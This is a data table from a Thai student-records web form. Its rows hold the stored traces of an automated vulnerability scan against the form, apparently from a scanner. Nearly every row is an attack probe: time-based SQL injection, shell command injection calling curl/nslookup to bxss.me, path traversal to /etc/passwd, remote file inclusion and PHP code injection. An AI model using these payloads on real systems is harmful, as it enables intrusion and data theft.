# รหัสนิสิต ชื่อ-สกุล คำถาม วันที่
1 1 gOZroFvd gOZroFvd 1 2023-09-08 19:30:24
2 1 gOZroFvd gOZroFvd 1 2023-09-08 19:30:24
3 1 gOZroFvd gOZroFvd 1 2023-09-08 19:30:24
4 1 gOZroFvd gOZroFvd 1 2023-09-08 19:30:22
5 1 gOZroFvd gOZroFvd 1 2023-09-08 19:30:09
6 1 gOZroFvd gOZroFvd 1 2023-09-08 19:29:58
7 1 gOZroFvd gOZroFvd 1 2023-09-08 19:29:49
8 1 gOZroFvd gOZroFvd 1 2023-09-08 19:29:38
9 1 gOZroFvd gOZroFvd 1 2023-09-08 19:29:28
10 1 gOZroFvd gOZroFvd 1 2023-09-08 19:29:20
11 1 gOZroFvd gOZroFvd 1 2023-09-08 19:29:07
12 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:57
13 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:50
14 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:42
15 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:35
16 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:28
17 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:28
18 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:28
19 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:28
20 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:28
21 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:28
22 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:21
23 1 gOZroFvd gOZroFvd 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 2023-09-08 19:28:13
24 1 gOZroFvd gOZroFvd 1'" 2023-09-08 19:28:13
25 1 gOZroFvd gOZroFvd 1 2023-09-08 19:28:13
26 1 gOZroFvd gOZroFvd @@GNZrz 2023-09-08 19:28:13
27 1 gOZroFvd gOZroFvd 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 2023-09-08 19:28:05
28 1 gOZroFvd gOZroFvd NnkgaII4')) OR 853=(SELECT 853 FROM PG_SLEEP(15))-- 2023-09-08 19:27:58
29 1 gOZroFvd gOZroFvd m7qRNnuG') OR 305=(SELECT 305 FROM PG_SLEEP(15))-- 2023-09-08 19:27:51
30 1 gOZroFvd gOZroFvd NQrf9EL8' OR 322=(SELECT 322 FROM PG_SLEEP(15))-- 2023-09-08 19:27:44
31 1 gOZroFvd gOZroFvd -1)) OR 880=(SELECT 880 FROM PG_SLEEP(15))-- 2023-09-08 19:27:37
32 1 gOZroFvd gOZroFvd -5) OR 261=(SELECT 261 FROM PG_SLEEP(15))-- 2023-09-08 19:27:31
33 1 gOZroFvd gOZroFvd -5 OR 679=(SELECT 679 FROM PG_SLEEP(15))-- 2023-09-08 19:27:24
34 1 gOZroFvd gOZroFvd 2znY1DvR')); waitfor delay '0:0:15' -- 2023-09-08 19:27:17
35 1 gOZroFvd gOZroFvd 2Mis6jBG'); waitfor delay '0:0:15' -- 2023-09-08 19:27:10
36 1 gOZroFvd gOZroFvd uOVvwHbt'; waitfor delay '0:0:15' -- 2023-09-08 19:27:03
37 1 gOZroFvd gOZroFvd 1 waitfor delay '0:0:15' -- 2023-09-08 19:26:56
38 1 gOZroFvd gOZroFvd -1)); waitfor delay '0:0:15' -- 2023-09-08 19:26:49
39 1 gOZroFvd gOZroFvd -1); waitfor delay '0:0:15' -- 2023-09-08 19:26:43
40 1 gOZroFvd gOZroFvd -1; waitfor delay '0:0:15' -- 2023-09-08 19:26:36
41 1 gOZroFvd gOZroFvd (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 2023-09-08 19:26:30
42 1 gOZroFvd gOZroFvd 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 2023-09-08 19:26:23
43 1 gOZroFvd gOZroFvd 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 2023-09-08 19:26:17
44 1 gOZroFvd gOZroFvd if(now()=sysdate(),sleep(15),0) 2023-09-08 19:26:11
45 1 gOZroFvd gOZroFvd 1 2023-09-08 19:26:05
46 1 gOZroFvd gOZroFvd -1 OR 2+634-634-1=0+0+0+1 -- 2023-09-08 19:26:05
47 1 gOZroFvd gOZroFvd -1 OR 2+147-147-1=0+0+0+1 2023-09-08 19:26:05
48 1 gOZroFvd gOZroFvd -1' OR 2+386-386-1=0+0+0+1 -- 2023-09-08 19:26:05
49 1 gOZroFvd gOZroFvd -1' OR 2+599-599-1=0+0+0+1 or 's4I8oczT'=' 2023-09-08 19:26:05
50 1 gOZroFvd gOZroFvd -1" OR 2+907-907-1=0+0+0+1 -- 2023-09-08 19:26:05
51 1 gOZroFvd gOZroFvd 1 2023-09-08 19:25:59
52 1 gOZroFvd gOZroFvd'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 1 2023-09-08 19:25:53
53 1 gOZroFvd 1'" 1 2023-09-08 19:25:53
54 1 gOZroFvd 1 1 2023-09-08 19:25:53
55 1 gOZroFvd @@LoSP6 1 2023-09-08 19:25:53
56 1 gOZroFvd cUDXFeqV')) OR 166=(SELECT 166 FROM PG_SLEEP(15))-- 1 2023-09-08 19:25:48
57 1 gOZroFvd VC30USwi') OR 271=(SELECT 271 FROM PG_SLEEP(15))-- 1 2023-09-08 19:25:42
58 1 gOZroFvd njX2tIB0' OR 994=(SELECT 994 FROM PG_SLEEP(15))-- 1 2023-09-08 19:25:37
59 1 gOZroFvd cdevFpE6')); waitfor delay '0:0:15' -- 1 2023-09-08 19:25:31
60 1 gOZroFvd GcaBP8fb'); waitfor delay '0:0:15' -- 1 2023-09-08 19:25:25
61 1 gOZroFvd 5D5mN0Y2'; waitfor delay '0:0:15' -- 1 2023-09-08 19:25:20
62 1 gOZroFvd 1 waitfor delay '0:0:15' -- 1 2023-09-08 19:25:14
63 1 gOZroFvd (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 1 2023-09-08 19:25:09
64 1 gOZroFvd 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 1 2023-09-08 19:25:03
65 1 gOZroFvd 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 1 2023-09-08 19:24:58
66 1 gOZroFvd if(now()=sysdate(),sleep(15),0) 1 2023-09-08 19:24:52
67 1 gOZroFvd -1 OR 2+597-597-1=0+0+0+1 -- 1 2023-09-08 19:24:46
68 1 gOZroFvd -1 OR 2+947-947-1=0+0+0+1 1 2023-09-08 19:24:46
69 1 gOZroFvd -1' OR 2+768-768-1=0+0+0+1 -- 1 2023-09-08 19:24:46
70 1 gOZroFvd -1' OR 2+881-881-1=0+0+0+1 or 'Vf2iAVjy'=' 1 2023-09-08 19:24:46
71 1 gOZroFvd -1" OR 2+326-326-1=0+0+0+1 -- 1 2023-09-08 19:24:46
72 1 gOZroFvd gOZroFvd 1 2023-09-08 19:24:45
73 1 gOZroFvd gOZroFvd 1 2023-09-08 19:24:40
74 1 1 gOZroFvd 1 2023-09-08 19:24:35
75 1 @@2ilrm gOZroFvd 1 2023-09-08 19:24:35
76 1 gOZroFvd'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' gOZroFvd 1 2023-09-08 19:24:34
77 1 1'" gOZroFvd 1 2023-09-08 19:24:34
78 1 dLBH0Z2F')) OR 20=(SELECT 20 FROM PG_SLEEP(15))-- gOZroFvd 1 2023-09-08 19:24:29
79 1 rtbMBhPt') OR 967=(SELECT 967 FROM PG_SLEEP(15))-- gOZroFvd 1 2023-09-08 19:24:24
80 1 KGBOAa0C' OR 678=(SELECT 678 FROM PG_SLEEP(15))-- gOZroFvd 1 2023-09-08 19:24:19
81 1 w2NFGEQb')); waitfor delay '0:0:15' -- gOZroFvd 1 2023-09-08 19:24:15
82 1 YtNqETpc'); waitfor delay '0:0:15' -- gOZroFvd 1 2023-09-08 19:24:09
83 1 NJ9KevZK'; waitfor delay '0:0:15' -- gOZroFvd 1 2023-09-08 19:24:03
84 1 1 waitfor delay '0:0:15' -- gOZroFvd 1 2023-09-08 19:23:55
85 1 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ gOZroFvd 1 2023-09-08 19:23:47
86 1 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z gOZroFvd 1 2023-09-08 19:23:36
87 1 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z gOZroFvd 1 2023-09-08 19:23:22
88 1 if(now()=sysdate(),sleep(15),0) gOZroFvd 1 2023-09-08 19:23:10
89 1 -1" OR 2+148-148-1=0+0+0+1 -- gOZroFvd 1 2023-09-08 19:23:00
90 1 -1' OR 2+288-288-1=0+0+0+1 -- gOZroFvd 1 2023-09-08 19:22:59
91 1 -1' OR 2+180-180-1=0+0+0+1 or 'kibWWXBJ'=' gOZroFvd 1 2023-09-08 19:22:59
92 1 -1 OR 2+299-299-1=0+0+0+1 -- gOZroFvd 1 2023-09-08 19:22:58
93 1 -1 OR 2+228-228-1=0+0+0+1 gOZroFvd 1 2023-09-08 19:22:58
94 1 gOZroFvd gOZroFvd 1 2023-09-08 19:22:57
95 1 gOZroFvd gOZroFvd 1 2023-09-08 19:22:48
96 0 gOZroFvd gOZroFvd 1 2023-09-08 19:22:11
97 0 gOZroFvd gOZroFvd 1 2023-09-08 19:22:04
98 0 gOZroFvd gOZroFvd 1 2023-09-08 19:21:52
99 0 gOZroFvd gOZroFvd 1 2023-09-08 19:21:28
100 0 gOZroFvd gOZroFvd 1 2023-09-08 19:21:16
101 0 gOZroFvd gOZroFvd 1 2023-09-08 19:21:11
102 0 gOZroFvd gOZroFvd 1 2023-09-08 19:20:58
103 0 gOZroFvd gOZroFvd 1 2023-09-08 19:20:37
104 0 gOZroFvd gOZroFvd 1 2023-09-08 19:20:12
105 0 2023-09-08 19:19:47
106 0 2023-09-08 19:19:40
107 0 gOZroFvd gOZroFvd 1 2023-09-08 19:19:34
108 0 2023-09-08 19:19:33
109 0 gOZroFvd gOZroFvd 1 2023-09-08 19:19:15
110 0 2023-09-08 19:19:11
111 0 gOZroFvd gOZroFvd 1 2023-09-08 19:18:52
112 0 2023-09-08 19:18:37
113 0 2023-09-08 19:18:35
114 1 gOZroFvd gOZroFvd 1 2023-09-08 19:18:33
115 1 gOZroFvd gOZroFvd 1 2023-09-08 19:18:32
116 0 2023-09-08 19:18:25
117 1 gOZroFvd gOZroFvd 1 2023-09-08 19:18:23
118 0 2023-09-08 19:18:07
119 1 2023-09-08 19:18:03
120 1 2023-09-08 19:18:02
121 1 2023-09-08 19:17:58
122 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:50
123 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:49
124 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:48
125 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:45
126 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:45
127 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:44
128 1 gOZroFvd '.gethostbyname(lc('hitqs'.'frxosrre40e1d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(71).chr(118).chr(65).' 555 2023-09-08 19:17:42
129 1 gOZroFvd ".gethostbyname(lc("hitgi"."irqrabub2ef42.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(85).chr(112).chr(72)." 555 2023-09-08 19:17:42
130 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:42
131 1 '.gethostbyname(lc('hitou'.'oojchfrl83b0d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(65).chr(99).chr(82).' gOZroFvd 555 2023-09-08 19:17:41
132 1 ".gethostbyname(lc("hitwe"."ngapcrpf2d3f2.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(73).chr(115).chr(75)." gOZroFvd 555 2023-09-08 19:17:41
133 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:40
134 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:37
135 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:37
136 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:36
137 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:36
138 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:35
139 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:35
140 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:34
141 1 gOZroFvd gOZroFvd bxss.me 2023-09-08 19:17:34
142 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:34
143 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:34
144 1 gOZroFvd gOZroFvd 555 2023-09-08 19:17:34
145 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:34
146 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:33
147 1 gOZroFvd gOZroFvd /etc/shells 2023-09-08 19:17:33
148 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:33
149 1 gOZroFvd gOZroFvd c:/windows/win.ini 2023-09-08 19:17:33
150 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:32
151 1 gOZroFvd gOZroFvd Http://bxss.me/t/fit.txt 2023-09-08 19:17:32
152 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:32
153 1 gOZroFvd gOZroFvd http://bxss.me/t/fit.txt%3F.jpg 2023-09-08 19:17:32
154 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:31
155 1 gOZroFvd gOZroFvd http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 2023-09-08 19:17:31
156 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:31
157 1 gOZroFvd gOZroFvd 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 2023-09-08 19:17:31
158 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:30
159 1 gOZroFvd gOZroFvd ;(nslookup -q=cname hitdnmfjkjfao9742d.bxss.me||curl hitdnmfjkjfao9742d.bxss.me)|(nslookup -q=cname hitdnmfjkjfao9742d.bxss.me||curl hitdnmfjkjfao9742d.bxss.me)&(nslookup -q=cname hitdnmfjkjfao9742d.bxss.me||curl hitdnmfjkjfao9742d.bxss.me) 2023-09-08 19:17:30
160 1 gOZroFvd c:/windows/win.ini 1 2023-09-08 19:17:30
161 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:30
162 1 gOZroFvd bxss.me 1 2023-09-08 19:17:30
163 1 gOZroFvd Http://bxss.me/t/fit.txt 1 2023-09-08 19:17:29
164 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:29
165 1 gOZroFvd gOZroFvd |(nslookup -q=cname hitjjpdqxdgbj1b641.bxss.me||curl hitjjpdqxdgbj1b641.bxss.me) 2023-09-08 19:17:29
166 1 gOZroFvd http://bxss.me/t/fit.txt%3F.jpg 1 2023-09-08 19:17:29
167 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:29
168 1 gOZroFvd gOZroFvd `(nslookup -q=cname hitlacdrtjluv66588.bxss.me||curl hitlacdrtjluv66588.bxss.me)` 2023-09-08 19:17:29
169 1 gOZroFvd /etc/shells 1 2023-09-08 19:17:29
170 1 gOZroFvd gOZroFvd $(nslookup -q=cname hitshrudpmhecc9e3d.bxss.me||curl hitshrudpmhecc9e3d.bxss.me) 2023-09-08 19:17:28
171 1 gOZroFvd http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg 1 2023-09-08 19:17:28
172 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:28
173 1 gOZroFvd gOZroFvd &nslookup -q=cname hitdkgploqcor89b22.bxss.me&'"`0&nslookup -q=cname hitdkgploqcor89b22.bxss.me&`' 2023-09-08 19:17:28
174 1 gOZroFvd 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg 1 2023-09-08 19:17:28
175 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:28
176 1 gOZroFvd gOZroFvd &(nslookup -q=cname hitmiwhgyolkk2cefd.bxss.me||curl hitmiwhgyolkk2cefd.bxss.me)&'"`0&(nslookup -q=cname hitmiwhgyolkk2cefd.bxss.me||curl hitmiwhgyolkk2cefd.bxss.me)&`' 2023-09-08 19:17:28
177 1 gOZroFvd gOZroFvd |echo enyvxr$() tawajp z^xyu||a #' |echo enyvxr$() tawajp z^xyu||a #|" |echo enyvxr$() tawajp z^xyu||a # 2023-09-08 19:17:27
178 1 c:/windows/win.ini gOZroFvd 1 2023-09-08 19:17:27
179 1 gOZroFvd gOZroFvd '.print(md5(31337)).' 2023-09-08 19:17:27
180 1 gOZroFvd gOZroFvd (nslookup -q=cname hithknzxmkhvxd0e4d.bxss.me||curl hithknzxmkhvxd0e4d.bxss.me)) 2023-09-08 19:17:27
181 1 bxss.me gOZroFvd 1 2023-09-08 19:17:27
182 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:27
183 1 gOZroFvd gOZroFvd echo dvmuxo$() vyqmnf z^xyu||a #' &echo dvmuxo$() vyqmnf z^xyu||a #|" &echo dvmuxo$() vyqmnf z^xyu||a # 2023-09-08 19:17:26
184 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:26
185 1 http://bxss.me/t/fit.txt%3F.jpg gOZroFvd 1 2023-09-08 19:17:26
186 1 gOZroFvd gOZroFvd ${@print(md5(31337))} 2023-09-08 19:17:26
187 1 gOZroFvd gOZroFvd &echo hqaciy$() kzcjyv z^xyu||a #' &echo hqaciy$() kzcjyv z^xyu||a #|" &echo hqaciy$() kzcjyv z^xyu||a # 2023-09-08 19:17:26
188 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:26
189 1 /etc/shells gOZroFvd 1 2023-09-08 19:17:26
190 1 http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg gOZroFvd 1 2023-09-08 19:17:25
191 1 gOZroFvd gOZroFvd ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 2023-09-08 19:17:25
192 1 gOZroFvd `(nslookup -q=cname hitqenhatbjsgdb195.bxss.me||curl hitqenhatbjsgdb195.bxss.me)` 1 2023-09-08 19:17:25
193 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:25
194 1 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg gOZroFvd 1 2023-09-08 19:17:25
195 1 gOZroFvd gOZroFvd ';print(md5(31337));$a=' 2023-09-08 19:17:25
196 1 gOZroFvd ;(nslookup -q=cname hitmmobucdkised189.bxss.me||curl hitmmobucdkised189.bxss.me)|(nslookup -q=cname hitmmobucdkised189.bxss.me||curl hitmmobucdkised189.bxss.me)&(nslookup -q=cname hitmmobucdkised189.bxss.me||curl hitmmobucdkised189.bxss.me) 1 2023-09-08 19:17:25
197 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:25
198 1 Http://bxss.me/t/fit.txt gOZroFvd 1 2023-09-08 19:17:25
199 1 gOZroFvd gOZroFvd ";print(md5(31337));$a=" 2023-09-08 19:17:25
200 1 gOZroFvd &(nslookup -q=cname hitabsuviwczh12060.bxss.me||curl hitabsuviwczh12060.bxss.me)&'"`0&(nslookup -q=cname hitabsuviwczh12060.bxss.me||curl hitabsuviwczh12060.bxss.me)&`' 1 2023-09-08 19:17:24
201 1 gOZroFvd gOZroFvd 1"||sleep(27*1000)*nfjikf||" 2023-09-08 19:17:24
202 1 gOZroFvd '.print(md5(31337)).' 1 2023-09-08 19:17:24
203 1 gOZroFvd |(nslookup -q=cname hitkbovqqmxccc6a56.bxss.me||curl hitkbovqqmxccc6a56.bxss.me) 1 2023-09-08 19:17:24
204 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:24
205 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:23
206 1 gOZroFvd (nslookup -q=cname hituhlholoyyj6804d.bxss.me||curl hituhlholoyyj6804d.bxss.me)) 1 2023-09-08 19:17:23
207 1 gOZroFvd gOZroFvd 1'&&sleep(27*1000)*itxjkt&&' 2023-09-08 19:17:23
208 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:23
209 1 gOZroFvd ";print(md5(31337));$a=" 1 2023-09-08 19:17:23
210 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:23
211 1 gOZroFvd $(nslookup -q=cname hitfcbbsonvca570e0.bxss.me||curl hitfcbbsonvca570e0.bxss.me) 1 2023-09-08 19:17:23
212 1 gOZroFvd gOZroFvd 1"&&sleep(27*1000)*xlmpkt&&" 2023-09-08 19:17:23
213 1 gOZroFvd ${@print(md5(31337))} 1 2023-09-08 19:17:23
214 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:23
215 1 gOZroFvd &nslookup -q=cname hitaheozcgynp8ca16.bxss.me&'"`0&nslookup -q=cname hitaheozcgynp8ca16.bxss.me&`' 1 2023-09-08 19:17:23
216 1 gOZroFvd gOZroFvd 1'||sleep(27*1000)*rjjqou||' 2023-09-08 19:17:23
217 1 '.print(md5(31337)).' gOZroFvd 1 2023-09-08 19:17:22
218 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:22
219 1 gOZroFvd gOZroFvd '"()&%ylyH(9117) 2023-09-08 19:17:22
220 1 gOZroFvd &echo opfykr$() jmvrrk z^xyu||a #' &echo opfykr$() jmvrrk z^xyu||a #|" &echo opfykr$() jmvrrk z^xyu||a # 1 2023-09-08 19:17:22
221 1 gOZroFvd gOZroFvd"||sleep(27*1000)*wzgcps||" 1 2023-09-08 19:17:22
222 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:22
223 1 gOZroFvd gOZroFvd 1&n943502=v957776 2023-09-08 19:17:22
224 1 gOZroFvd ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 1 2023-09-08 19:17:22
225 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:22
226 1 gOZroFvd gOZroFvd 19442283 2023-09-08 19:17:22
227 1 gOZroFvd |echo fxxmcn$() kuhsrk z^xyu||a #' |echo fxxmcn$() kuhsrk z^xyu||a #|" |echo fxxmcn$() kuhsrk z^xyu||a # 1 2023-09-08 19:17:22
228 1 gOZroFvd gOZroFvd '"() 2023-09-08 19:17:22
229 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:22
230 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:22
231 1 gOZroFvd ';print(md5(31337));$a=' 1 2023-09-08 19:17:22
232 1 gOZroFvd gOZroFvd'&&sleep(27*1000)*wgpicn&&' 1 2023-09-08 19:17:21
233 1 gOZroFvd gOZroFvd ../1 2023-09-08 19:17:21
234 1 ${@print(md5(31337))} gOZroFvd 1 2023-09-08 19:17:21
235 1 gOZroFvd gOZroFvd ^(#$!@#$)(()))****** 2023-09-08 19:17:21
236 1 gOZroFvd gOZroFvd9663226 1 2023-09-08 19:17:21
237 1 ;(nslookup -q=cname hitbyldullldce6c74.bxss.me||curl hitbyldullldce6c74.bxss.me)|(nslookup -q=cname hitbyldullldce6c74.bxss.me||curl hitbyldullldce6c74.bxss.me)&(nslookup -q=cname hitbyldullldce6c74.bxss.me||curl hitbyldullldce6c74.bxss.me) gOZroFvd 1 2023-09-08 19:17:21
238 1 gOZroFvd gOZroFvd"&&sleep(27*1000)*cwjqzt&&" 1 2023-09-08 19:17:21
239 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:21
240 1 gOZroFvd&n915794=v908487 gOZroFvd 1 2023-09-08 19:17:21
241 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:21
242 1 gOZroFvd gOZroFvd 1'"()&%ylyH(9811) 2023-09-08 19:17:21
243 1 gOZroFvd echo rtuiyl$() ylqllu z^xyu||a #' &echo rtuiyl$() ylqllu z^xyu||a #|" &echo rtuiyl$() ylqllu z^xyu||a # 1 2023-09-08 19:17:21
244 1 gOZroFvd gOZroFvd'||sleep(27*1000)*hcosmq||' 1 2023-09-08 19:17:21
245 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:21
246 1 gOZroFvd gOZroFvd&n989858=v929950 1 2023-09-08 19:17:21
247 1 gOZroFvd ^(#$!@#$)(()))****** 1 2023-09-08 19:17:20
248 1 gOZroFvd9995011 gOZroFvd 1 2023-09-08 19:17:20
249 1 &(nslookup -q=cname hiteogyetqfmcc5a51.bxss.me||curl hiteogyetqfmcc5a51.bxss.me)&'"`0&(nslookup -q=cname hiteogyetqfmcc5a51.bxss.me||curl hiteogyetqfmcc5a51.bxss.me)&`' gOZroFvd 1 2023-09-08 19:17:20
250 1 gOZroFvd"||sleep(27*1000)*ijsufi||" gOZroFvd 1 2023-09-08 19:17:20
251 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:20
252 1 gOZroFvd gOZroFvd file:///etc/passwd 2023-09-08 19:17:20
253 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:20
254 1 ';print(md5(31337));$a=' gOZroFvd 1 2023-09-08 19:17:20
255 1 gOZroFvd gOZroFvd ) 2023-09-08 19:17:20
256 1 gOZroFvd gOZroFvd'"()&%ylyH(9785) 1 2023-09-08 19:17:20
257 1 bHR1THdyN2s= gOZroFvd 1 2023-09-08 19:17:20
258 1 |(nslookup -q=cname hittlyeyooupq721a4.bxss.me||curl hittlyeyooupq721a4.bxss.me) gOZroFvd 1 2023-09-08 19:17:20
259 1 gOZroFvd '"() 1 2023-09-08 19:17:20
260 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:20
261 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:20
262 1 ";print(md5(31337));$a=" gOZroFvd 1 2023-09-08 19:17:20
263 1 gOZroFvd gOZroFvd !(()&&!|*|*| 2023-09-08 19:17:20
264 1 gOZroFvd '"()&%ylyH(9846) 1 2023-09-08 19:17:20
265 1 gOZroFvd U1dkTFA3Z3A= 1 2023-09-08 19:17:20
266 1 `(nslookup -q=cname hitgqhhujzgxib57a7.bxss.me||curl hitgqhhujzgxib57a7.bxss.me)` gOZroFvd 1 2023-09-08 19:17:20
267 1 gOZroFvd'||sleep(27*1000)*tlxnol||' gOZroFvd 1 2023-09-08 19:17:19
268 1 gOZroFvd gOZroFvd 2023-09-08 19:17:19
269 1 gOZroFvd gOZroFvd ../../../../../../../../../../../../../../windows/win.ini 2023-09-08 19:17:19
270 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:19
271 1 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); gOZroFvd 1 2023-09-08 19:17:19
272 1 gOZroFvd'&&sleep(27*1000)*xuyezs&&' gOZroFvd 1 2023-09-08 19:17:19
273 1 gOZroFvd 1 2023-09-08 19:17:19
274 1 gOZroFvd ../gOZroFvd 1 2023-09-08 19:17:19
275 1 gOZroFvd gOZroFvd HttP://bxss.me/t/xss.html?%00 2023-09-08 19:17:19
276 1 gOZroFvd ) 1 2023-09-08 19:17:19
277 1 gOZroFvd'"()&%ylyH(9667) gOZroFvd 1 2023-09-08 19:17:19
278 1 $(nslookup -q=cname hitvdmlhjnxvs1d9fb.bxss.me||curl hitvdmlhjnxvs1d9fb.bxss.me) gOZroFvd 1 2023-09-08 19:17:19
279 1 gOZroFvd"&&sleep(27*1000)*zjbqbu&&" gOZroFvd 1 2023-09-08 19:17:19
280 1 gOZroFvd gOZroFvd '" 2023-09-08 19:17:19
281 1 gOZroFvd gOZroFvd ../../../../../../../../../../../../../../etc/passwd 2023-09-08 19:17:19
282 1 gOZroFvd gOZroFvd bxss.me/t/xss.html?%00 2023-09-08 19:17:19
283 1 gOZroFvd !(()&&!|*|*| 1 2023-09-08 19:17:19
284 1 '"()&%ylyH(9438) gOZroFvd 1 2023-09-08 19:17:19
285 1 &nslookup -q=cname hitvnyjbfxjus63eae.bxss.me&'"`0&nslookup -q=cname hitvnyjbfxjus63eae.bxss.me&`' gOZroFvd 1 2023-09-08 19:17:19
286 1 &echo ecxmps$() auckjz z^xyu||a #' &echo ecxmps$() auckjz z^xyu||a #|" &echo ecxmps$() auckjz z^xyu||a # gOZroFvd 1 2023-09-08 19:17:18
287 1 gOZroFvd 1 2023-09-08 19:17:18
288 1 gOZroFvd file:///etc/passwd 1 2023-09-08 19:17:18
289 1 gOZroFvd HttP://bxss.me/t/xss.html?%00 1 2023-09-08 19:17:18
290 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:18
291 1 !(()&&!|*|*| gOZroFvd 1 2023-09-08 19:17:18
292 1 |echo hwjkmj$() mopssq z^xyu||a #' |echo hwjkmj$() mopssq z^xyu||a #|" |echo hwjkmj$() mopssq z^xyu||a # gOZroFvd 1 2023-09-08 19:17:18
293 1 '"() gOZroFvd 1 2023-09-08 19:17:18
294 1 gOZroFvd '" 1 2023-09-08 19:17:18
295 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:18
296 1 gOZroFvd bxss.me/t/xss.html?%00 1 2023-09-08 19:17:18
297 1 gOZroFvd gOZroFvd 1 2023-09-08 19:17:18
298 1 ^(#$!@#$)(()))****** gOZroFvd 1 2023-09-08 19:17:18
299 19930176 gOZroFvd gOZroFvd 1 2023-09-08 19:17:18
300 1 (nslookup -q=cname hitdnimvwneiv75f75.bxss.me||curl hitdnimvwneiv75f75.bxss.me)) gOZroFvd 1 2023-09-08 19:17:18
